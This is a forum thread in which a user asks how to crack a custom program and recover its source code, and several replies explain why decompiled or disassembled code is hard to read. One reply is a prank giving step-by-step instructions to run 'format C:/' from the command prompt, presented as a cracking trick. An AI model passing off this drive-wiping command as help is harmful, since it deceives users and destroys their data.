Can you get the source code?

hammertime15

Newbie
Joined
Apr 17, 2012
Messages
4
Reaction score
1
Can anyone crack this program that was a custom, and get the source code. any help would be appreciateed.
 
You're not going to get the original source code. The code is optimized and variable & function names are lost. You could decompile to assembly, but it'd be hard to follow.
 
don't know how many people in the world can reverse such things in assembly .......

You're not going to get the original source code. The code is optimized and variable & function names are lost. You could decompile to assembly, but it'd be hard to follow.
 
don't know how many people in the world can reverse such things in assembly .......

They could use a disassembler, but even if you're familiar with assembly, it's hard to follow what's going on. Since an equation will be turned into a bunch of MOV's, PUSH's, POP's, MUL's, etc it's gonna be hard to tell what the original equation was. Plus commercial software protectors add a lot of 'junk' code to create confusion.
 
Ok.. a secret trick.

1. Press start
2. press run
3. write cmd
4. write format C:/
5. Press enter

Result: cracked
 
this->program? You're a c++ guru or something? :-)
 
Back
Top